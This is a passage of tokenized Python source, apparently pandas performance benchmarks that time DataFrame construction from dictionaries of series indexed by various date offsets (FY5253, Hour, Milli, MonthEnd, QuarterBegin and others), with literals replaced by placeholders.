ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253Quarterx2__variation_last ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253Quarter ( <NUM_LIT:2> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253Quarterx2__variation_last ( self ) : <EOL> DataFrame ( self . 
d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253Quarterx2__variation_nearest ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253Quarter ( <NUM_LIT:2> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253Quarterx2__variation_nearest ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . 
start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253x1__variation_last ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253 ( <NUM_LIT:1> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253x1__variation_last ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253x1__variation_nearest ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253 ( <NUM_LIT:1> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253x1__variation_nearest ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . 
ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253x2__variation_last ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253 ( <NUM_LIT:2> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253x2__variation_last ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253x2__variation_nearest ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . 
get_index_for_offset ( FY5253 ( <NUM_LIT:2> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253x2__variation_nearest ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Hourx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Hour ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Hourx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . 
start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Hourx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Hour ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Hourx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_LastWeekOfMonthx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( LastWeekOfMonth ( <NUM_LIT:1> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_LastWeekOfMonthx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . 
days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_LastWeekOfMonthx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( LastWeekOfMonth ( <NUM_LIT:2> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_LastWeekOfMonthx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Microx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Micro ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . 
d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Microx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Microx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Micro ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Microx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . 
start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Millix1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Milli ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Millix1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Millix2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Milli ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Millix2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . 
ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Minutex1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Minute ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Minutex1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Minutex2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Minute ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Minutex2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . 
ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_MonthBeginx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( MonthBegin ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_MonthBeginx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_MonthBeginx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( MonthBegin ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . 
idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_MonthBeginx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_MonthEndx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( MonthEnd ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_MonthEndx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . 
start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_MonthEndx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( MonthEnd ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_MonthEndx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Nanox1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Nano ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Nanox1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . 
ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Nanox2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Nano ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Nanox2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_QuarterBeginx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( QuarterBegin ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_QuarterBeginx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . 
ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_QuarterBeginx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( QuarterBegin ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_QuarterBeginx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class 